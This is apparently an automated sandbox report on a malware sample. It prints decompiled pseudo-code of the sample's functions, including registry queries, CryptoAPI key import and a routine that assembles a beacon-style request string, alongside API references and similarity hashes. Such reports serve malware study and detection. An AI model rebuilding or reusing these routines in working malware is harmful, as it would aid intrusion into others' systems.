                        • RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: dd1566cd8cdec36c88bdd0dae86ea96cebf18be4dbfa4f7b36871e071c0b4050
                        • Instruction ID: d3acb774b4ff744fec7054c085a58b8c20c5cfc3804091016930d9092806eaaa
                        • Opcode Fuzzy Hash: dd1566cd8cdec36c88bdd0dae86ea96cebf18be4dbfa4f7b36871e071c0b4050
                        • Instruction Fuzzy Hash: ADB012B5514100ABEA024B00DE04FD97B22F794B00F40C410B30890060C2360C20EB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04772A03(void* _a4) {
                        				char _t2;
                        
                        				_t2 = RtlFreeHeap( *0x477a290, 0, _a4); // executed
                        				return _t2;
                        			}





                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 769445c19e3382ea5d9d9f4bca4bcda53a72b084f583076fc5c7dff575612dda
                        • Instruction ID: b72e91eecde0e6322a5658ed787c4150e71a520963da24a458a4b981fe2b2f3c
                        • Opcode Fuzzy Hash: 769445c19e3382ea5d9d9f4bca4bcda53a72b084f583076fc5c7dff575612dda
                        • Instruction Fuzzy Hash: 2FB012B1114100EBEE024B00DE08F497B22F790B00F40C410B3041006082360C20EB14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E047730AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				signed short _t18;
                        				void* _t24;
                        				signed int _t26;
                        				signed short _t27;
                        
                        				if(_a4 != 0) {
                        					_t18 = E04774BFF(_a4, _a8, _a12, __esi); // executed
                        					_t27 = _t18;
                        				} else {
                        					_t27 = E04775419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                        					if(_t27 == 0) {
                        						_t26 = _a8 >> 1;
                        						if(_t26 == 0) {
                        							_t27 = 2;
                        							HeapFree( *0x477a290, 0, _a12);
                        						} else {
                        							_t24 = _a12;
                        							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                        							 *__esi = _t24;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}








                        APIs
                          • Part of subcall function 04775419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43,80000002), ref: 0477545B
                          • Part of subcall function 04775419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43), ref: 04775480
                          • Part of subcall function 04775419: RegCloseKey.ADVAPI32(80000002,?,04772115,3D047790,80000002,04777319,00000000,04777319,?,65696C43,80000002,00000000,?), ref: 047754B0
                        • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,04774A79,?,004F0053,050E9338,00000000,?), ref: 047730F8
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: QueryValue$CloseFreeHeap
                        • String ID:
                        • API String ID: 2109406458-0
                        • Opcode ID: 6d074682ab33e46ba847c62de78fe970cae60e59f8d0b83402de0ea0bb6706b5
                        • Instruction ID: c9275ae2f2364ee4ed3613c8d5cc04fb062cf6167835e3411521f4791df64f55
                        • Opcode Fuzzy Hash: 6d074682ab33e46ba847c62de78fe970cae60e59f8d0b83402de0ea0bb6706b5
                        • Instruction Fuzzy Hash: BF011D32240649FBDF129F45CC46FAA3B66FB84350F95C829FE198A250D631E920EB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E04775872(intOrPtr* __edi) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr _v16;
                        				intOrPtr _t15;
                        				intOrPtr* _t21;
                        
                        				_t21 = __edi;
                        				_push( &_v12);
                        				_push(__edi);
                        				_v8 = 0x1d4c0;
                        				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                        				while(1) {
                        					_v16 = _t15;
                        					Sleep(0x1f4); // executed
                        					if(_v12 == 4) {
                        						break;
                        					}
                        					if(_v8 == 0) {
                        						L4:
                        						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                        						continue;
                        					} else {
                        						if(_v8 <= 0x1f4) {
                        							_v16 = 0x80004004;
                        						} else {
                        							_v8 = _v8 - 0x1f4;
                        							goto L4;
                        						}
                        					}
                        					L8:
                        					return _v16;
                        				}
                        				goto L8;
                        			}









                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 047758BA
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 2aadafaf62e96775679761120b980c2916b82688856a38bc3f4986dce63d798f
                        • Instruction ID: 3034a92553419a3a03d1b2106361122f8096e779dc081d7250d8c9f91452de35
                        • Opcode Fuzzy Hash: 2aadafaf62e96775679761120b980c2916b82688856a38bc3f4986dce63d798f
                        • Instruction Fuzzy Hash: E6F0F975D01218FFDF00DB95C888AEDB7B8EF05305F5488AAE502A7240E7B86B84DF65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E04771AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
                        				void* _t13;
                        				void* _t21;
                        
                        				_t11 =  &_a4;
                        				_t21 = 0;
                        				__imp__( &_a8);
                        				_t13 = E047735A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                        				if(_t13 == 0) {
                        					_t21 = E04775C4E(_a8 + _a8);
                        					if(_t21 != 0) {
                        						E04774502(_a4, _t21, _t23);
                        					}
                        					E04772A03(_a4);
                        				}
                        				return _t21;
                        			}






                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04771B02
                          • Part of subcall function 047735A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04771B16,00000001,04776301,00000000), ref: 047735D9
                          • Part of subcall function 047735A1: memcpy.NTDLL(04771B16,04776301,00000010,?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000), ref: 047735F2
                          • Part of subcall function 047735A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0477361B
                          • Part of subcall function 047735A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04773633
                          • Part of subcall function 047735A1: memcpy.NTDLL(00000000,00000000,050E9630,00000010), ref: 04773685
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                        • String ID:
                        • API String ID: 894908221-0
                        • Opcode ID: e86e62622808e7f8e35b4ba63c1a7fa908fd0dbf771e5d4b6883e2d0323484bf
                        • Instruction ID: 77b1beca4a68d8daabcd9290af21cbcec3daf7d7a413c92be387224efcb72b27
                        • Opcode Fuzzy Hash: e86e62622808e7f8e35b4ba63c1a7fa908fd0dbf771e5d4b6883e2d0323484bf
                        • Instruction Fuzzy Hash: E5F01276100109BBDF116F65DC04DEF7FADEF853A4B858022FD19DA220EA31EA55DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E047745E6(void* __edx, void* __edi, void* _a4) {
                        				int _t7;
                        				int _t13;
                        
                        				_t7 = E04771896(__edx, __edi, _a4,  &_a4); // executed
                        				_t13 = _t7;
                        				if(_t13 != 0) {
                        					memcpy(__edi, _a4, _t13);
                        					 *((char*)(__edi + _t13)) = 0;
                        					E04772A03(_a4);
                        				}
                        				return _t13;
                        			}

                        APIs
                          • Part of subcall function 04771896: memcpy.NTDLL(00000000,00000110,04771C1F,04771C1F,?,?,04771C1F,?,?,047724E4,?), ref: 047718CC
                          • Part of subcall function 04771896: memset.NTDLL ref: 04771942
                          • Part of subcall function 04771896: memset.NTDLL ref: 04771956
                        • memcpy.NTDLL(04771C1F,04771C1F,00000000,04771C1F,04771C1F,04771C1F,?,?,047724E4,?,?,04771C1F,?), ref: 04774602
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memcpymemset$FreeHeap
                        • String ID:
                        • API String ID: 3053036209-0
                        • Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
                        • Instruction ID: 18c4ed3e60f2aee9633f67e622fadf2adf6769b90f09984d748cdcf44b9e4cdd
                        • Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
                        • Instruction Fuzzy Hash: C6E08C368001287BDF226A94DC00EFB7F6CCF456E0F404020FE088A301E631E61097E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?), ref: 6C55F2A4
                        Memory Dump Source
                        • Source File: 00000003.00000002.920249299.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d03c8ac24e77a378d574aeaa2564687c4a5ed2c0e67f4dce4add3046f7a40403
                        • Instruction ID: 9ace2cff583cf89fb3179906299917247f21d23bc320736bd1c4fd9a3bee4b47
                        • Opcode Fuzzy Hash: d03c8ac24e77a378d574aeaa2564687c4a5ed2c0e67f4dce4add3046f7a40403
                        • Instruction Fuzzy Hash: A2E086321441119FDB15CF14CCB5B533796EB44350F1C0499ED09EF2C5EBF1380686A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        APIs
                        • _wcscmp.LIBCMT ref: 6C556F2D
                        • _wcscmp.LIBCMT ref: 6C556F3E
                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F5A
                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F84
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: InfoLocale_wcscmp
                        • String ID: ACP$OCP
                        • API String ID: 1351282208-711371036
                        • Opcode ID: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
                        • Instruction ID: 814d534386a319738601c17fc51356a5642658c7b1dacc2b3072a1e2ccd1af0b
                        • Opcode Fuzzy Hash: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
                        • Instruction Fuzzy Hash: C7019632619285BBEB008E59DC44FE637B89F05758F508017F504DAA54EF31DA91C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,8hQl,6C54B7B8,?,?,?,00000001), ref: 6C548B1F
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6C548B28
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID: 8hQl
                        • API String ID: 3192549508-3048985772
                        • Opcode ID: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
                        • Instruction ID: 18f33c8217b0b065b46d8380693cd75c65a5a50e218b45ea735d35ef527fdd64
                        • Opcode Fuzzy Hash: 67758587fd8f2e06453831a10d73201833cc5d3484ebbf6b560d71359c1da25c
                        • Instruction Fuzzy Hash: 98B09236044248ABDE102B99D809BB83F78EB0A662F010011F64E448608B76A4908A91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E04776124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				void* _v24;
                        				intOrPtr _v40;
                        				void* __ecx;
                        				void* __edi;
                        				intOrPtr _t31;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				intOrPtr _t35;
                        				void* _t38;
                        				intOrPtr _t39;
                        				int _t42;
                        				void* _t43;
                        				intOrPtr _t44;
                        				intOrPtr _t48;
                        				intOrPtr _t52;
                        				intOrPtr _t55;
                        				intOrPtr _t56;
                        				intOrPtr _t62;
                        				intOrPtr _t66;
                        				intOrPtr* _t68;
                        				intOrPtr _t78;
                        				intOrPtr _t81;
                        				intOrPtr _t84;
                        				int _t87;
                        				intOrPtr _t88;
                        				int _t91;
                        				intOrPtr _t92;
                        				int _t95;
                        				void* _t98;
                        				void* _t99;
                        				void* _t103;
                        				intOrPtr _t105;
                        				long _t107;
                        				intOrPtr _t108;
                        				intOrPtr* _t109;
                        				long _t110;
                        				int _t111;
                        				void* _t112;
                        				void* _t113;
                        				void* _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t118;
                        				void* _t120;
                        				void* _t121;
                        
                        				_t103 = __edx;
                        				_t110 = __eax;
                        				_v8 = 8;
                        				_t117 = RtlAllocateHeap( *0x477a290, 0, 0x800);
                        				if(_t117 != 0) {
                        					if(_t110 == 0) {
                        						_t110 = GetTickCount();
                        					}
                        					_t31 =  *0x477a018; // 0x5ffc1f8b
                        					asm("bswap eax");
                        					_t32 =  *0x477a014; // 0x5cb11ae7
                        					asm("bswap eax");
                        					_t33 =  *0x477a010; // 0x15dc9586
                        					asm("bswap eax");
                        					_t34 =  *0x477a00c; // 0x67522d90
                        					asm("bswap eax");
                        					_t35 =  *0x477a2d0; // 0x96d5a8
                        					_t2 = _t35 + 0x477b622; // 0x74666f73
                        					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x477a02c,  *0x477a004, _t110);
                        					_t38 = E0477271A();
                        					_t39 =  *0x477a2d0; // 0x96d5a8
                        					_t3 = _t39 + 0x477b662; // 0x74707526
                        					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                        					_t120 = _t118 + 0x38;
                        					_t112 = _t111 + _t42;
                        					if(_a12 != 0) {
                        						_t92 =  *0x477a2d0; // 0x96d5a8
                        						_t7 = _t92 + 0x477b66d; // 0x732526
                        						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                        						_t120 = _t120 + 0xc;
                        						_t112 = _t112 + _t95;
                        					}
                        					_t43 = E04772956(_t99);
                        					_t44 =  *0x477a2d0; // 0x96d5a8
                        					_t9 = _t44 + 0x477b38a; // 0x6d697426
                        					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                        					_t48 =  *0x477a2d0; // 0x96d5a8
                        					_t11 = _t48 + 0x477b33b; // 0x74636126
                        					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                        					_t52 =  *0x477a328; // 0x50e95b0
                        					_t121 = _t120 + 0x1c;
                        					if(_t52 != 0) {
                        						_t88 =  *0x477a2d0; // 0x96d5a8
                        						_t13 = _t88 + 0x477b685; // 0x73797326
                        						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                        						_t121 = _t121 + 0xc;
                        						_t114 = _t114 + _t91;
                        					}
                        					_t105 =  *0x477a37c; // 0x50e9630
                        					_a28 = E04775741(0x477a00a, _t105 + 4);
                        					_t55 =  *0x477a318; // 0x50e95e0
                        					_t107 = 0;
                        					if(_t55 != 0) {
                        						_t84 =  *0x477a2d0; // 0x96d5a8
                        						_t16 = _t84 + 0x477b8ea; // 0x3d736f26
                        						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                        						_t121 = _t121 + 0xc;
                        						_t114 = _t114 + _t87;
                        					}
                        					_t56 =  *0x477a314; // 0x0
                        					if(_t56 != _t107) {
                        						_t81 =  *0x477a2d0; // 0x96d5a8
                        						_t18 = _t81 + 0x477b8c1; // 0x3d706926
                        						wsprintfA(_t114 + _t117, _t18, _t56);
                        					}
                        					if(_a28 != _t107) {
                        						_t98 = RtlAllocateHeap( *0x477a290, _t107, 0x800);
                        						if(_t98 != _t107) {
                        							E04771A51(GetTickCount());
                        							_t62 =  *0x477a37c; // 0x50e9630
                        							__imp__(_t62 + 0x40);
                        							asm("lock xadd [eax], ecx");
                        							_t66 =  *0x477a37c; // 0x50e9630
                        							__imp__(_t66 + 0x40);
                        							_t68 =  *0x477a37c; // 0x50e9630
                        							_t115 = E04775AE3(1, _t103, _t117,  *_t68);
                        							asm("lock xadd [eax], ecx");
                        							if(_t115 != _t107) {
                        								StrTrimA(_t115, 0x47792cc);
                        								_push(_t115);
                        								_t108 = E04772829();
                        								_v4 = _t108;
                        								if(_t108 != 0) {
                        									 *_t115 = 0;
                        									__imp__(_t98, _a8);
                        									_t109 = __imp__;
                        									 *_t109(_t98, _t108);
                        									 *_t109(_t98, _t115);
                        									_t78 = E04773B46(0xffffffffffffffff, _t98, _v12, _v8);
                        									_v40 = _t78;
                        									if(_t78 != 0 && _t78 != 0x10d2) {
                        										E04772813();
                        									}
                        									HeapFree( *0x477a290, 0, _v24);
                        								}
                        								HeapFree( *0x477a290, 0, _t115);
                        								_t107 = 0;
                        							}
                        							HeapFree( *0x477a290, _t107, _t98);
                        						}
                        						HeapFree( *0x477a290, _t107, _a20);
                        					}
                        					HeapFree( *0x477a290, _t107, _t117);
                        				}
                        				return _v16;
                        			}

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04776142
                        • GetTickCount.KERNEL32 ref: 04776156
                        • wsprintfA.USER32 ref: 047761A5
                        • wsprintfA.USER32 ref: 047761C2
                        • wsprintfA.USER32 ref: 047761E3
                        • wsprintfA.USER32 ref: 04776201
                        • wsprintfA.USER32 ref: 04776216
                        • wsprintfA.USER32 ref: 04776237
                        • wsprintfA.USER32 ref: 04776271
                        • wsprintfA.USER32 ref: 04776291
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047762AC
                        • GetTickCount.KERNEL32 ref: 047762BC
                        • RtlEnterCriticalSection.NTDLL(050E95F0), ref: 047762D0
                        • RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 047762EE
                          • Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
                          • Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16
                          • Part of subcall function 04775AE3: strcpy.NTDLL ref: 04775B2D
                          • Part of subcall function 04775AE3: lstrcat.KERNEL32(00000000,00000000), ref: 04775B38
                          • Part of subcall function 04775AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55
                        • StrTrimA.SHLWAPI(00000000,047792CC,00000000,050E9630), ref: 0477631C
                          • Part of subcall function 04772829: lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
                          • Part of subcall function 04772829: lstrlen.KERNEL32(?), ref: 04772841
                          • Part of subcall function 04772829: lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
                          • Part of subcall function 04772829: lstrcat.KERNEL32(00000000,?), ref: 04772860
                        • lstrcpy.KERNEL32(00000000,?), ref: 0477633A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 04776348
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0477634C
                        • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 0477637C
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0477638B
                        • HeapFree.KERNEL32(00000000,00000000,00000000,050E9630), ref: 0477639B
                        • HeapFree.KERNEL32(00000000,?), ref: 047763AC
                        • HeapFree.KERNEL32(00000000,00000000), ref: 047763BA
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                        • String ID:
                        • API String ID: 1837416118-0
                        • Opcode ID: fa9fdbf5a6a18d869d646ef8d58b13527aa4d391d9aa0298b25f4755c65bf82e
                        • Instruction ID: 62e916feef6e5f259bdd4a8a3753e70b379779794ce6c5a027f7bca0b8b30dbc
                        • Opcode Fuzzy Hash: fa9fdbf5a6a18d869d646ef8d58b13527aa4d391d9aa0298b25f4755c65bf82e
                        • Instruction Fuzzy Hash: 447192B2500205AFEB11DB68EC88DDA77ECFB88714B958915FA49D3211E63EEC05CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlDecodePointer.NTDLL ref: 6C54AF65
                        • _free.LIBCMT ref: 6C54AF7E
                          • Part of subcall function 6C543F97: HeapFree.KERNEL32(00000000,00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FAB
                          • Part of subcall function 6C543F97: GetLastError.KERNEL32(00000000,?,6C54C47F,00000000,00000001,00000000,?,00000000,?,6C54493E,6C5421A2,?), ref: 6C543FBD
                        • _free.LIBCMT ref: 6C54AF91
                        • _free.LIBCMT ref: 6C54AFAF
                        • _free.LIBCMT ref: 6C54AFC1
                        • _free.LIBCMT ref: 6C54AFD2
                        • _free.LIBCMT ref: 6C54AFDD
                        • _free.LIBCMT ref: 6C54B001
                        • RtlEncodePointer.NTDLL(6D569338), ref: 6C54B008
                        • _free.LIBCMT ref: 6C54B01D
                        • _free.LIBCMT ref: 6C54B033
                        • _free.LIBCMT ref: 6C54B05B
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                        • String ID:
                        • API String ID: 3064303923-0
                        • Opcode ID: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
                        • Instruction ID: 912bdc1ad3590a5045c857e35203e4f4a1a18632b5009ce8b51b050db4ff889a
                        • Opcode Fuzzy Hash: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
                        • Instruction Fuzzy Hash: AD218575A06BD0EFDF105F2DDC446A93BB0EB46B65B12412DE82493EB0EB395844CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 27%
                        			E0477762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				long _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				void* __esi;
                        				long _t43;
                        				intOrPtr _t44;
                        				intOrPtr _t46;
                        				void* _t48;
                        				void* _t49;
                        				void* _t50;
                        				intOrPtr _t54;
                        				intOrPtr _t57;
                        				void* _t58;
                        				void* _t59;
                        				void* _t60;
                        				intOrPtr _t66;
                        				void* _t71;
                        				void* _t74;
                        				intOrPtr _t75;
                        				void* _t77;
                        				intOrPtr _t79;
                        				intOrPtr* _t80;
                        				intOrPtr _t91;
                        
                        				_t79 =  *0x477a38c; // 0x50e9cd0
                        				_v24 = 8;
                        				_t43 = GetTickCount();
                        				_push(5);
                        				_t74 = 0xa;
                        				_v16 = _t43;
                        				_t44 = E04775F43(_t74,  &_v16);
                        				_v8 = _t44;
                        				if(_t44 == 0) {
                        					_v8 = 0x47791cc;
                        				}
                        				_t46 = E047743FD(_t79);
                        				_v12 = _t46;
                        				if(_t46 != 0) {
                        					_t80 = __imp__;
                        					_t48 =  *_t80(_v8, _t71);
                        					_t49 =  *_t80(_v12);
                        					_t50 =  *_t80(_a4);
                        					_t54 = E04775C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                        					_v20 = _t54;
                        					if(_t54 != 0) {
                        						_t75 =  *0x477a2d0; // 0x96d5a8
                        						_t16 = _t75 + 0x477bad8; // 0x530025
                        						 *0x477a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                        						_push(4);
                        						_t77 = 5;
                        						_t57 = E04775F43(_t77,  &_v16);
                        						_v8 = _t57;
                        						if(_t57 == 0) {
                        							_v8 = 0x47791d0;
                        						}
                        						_t58 =  *_t80(_v8);
                        						_t59 =  *_t80(_v12);
                        						_t60 =  *_t80(_a4);
                        						_t91 = E04775C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                        						if(_t91 == 0) {
                        							E04772A03(_v20);
                        						} else {
                        							_t66 =  *0x477a2d0; // 0x96d5a8
                        							_t31 = _t66 + 0x477bbf8; // 0x73006d
                        							 *0x477a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                        							 *_a16 = _v20;
                        							_v24 = _v24 & 0x00000000;
                        							 *_a20 = _t91;
                        						}
                        					}
                        					E04772A03(_v12);
                        				}
                        				return _v24;
                        			}

                        APIs
                        • GetTickCount.KERNEL32 ref: 04777641
                        • lstrlen.KERNEL32(?,80000002,00000005), ref: 04777681
                        • lstrlen.KERNEL32(00000000), ref: 0477768A
                        • lstrlen.KERNEL32(00000000), ref: 04777691
                        • lstrlenW.KERNEL32(80000002), ref: 0477769E
                        • lstrlen.KERNEL32(?,00000004), ref: 047776FE
                        • lstrlen.KERNEL32(?), ref: 04777707
                        • lstrlen.KERNEL32(?), ref: 0477770E
                        • lstrlenW.KERNEL32(?), ref: 04777715
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
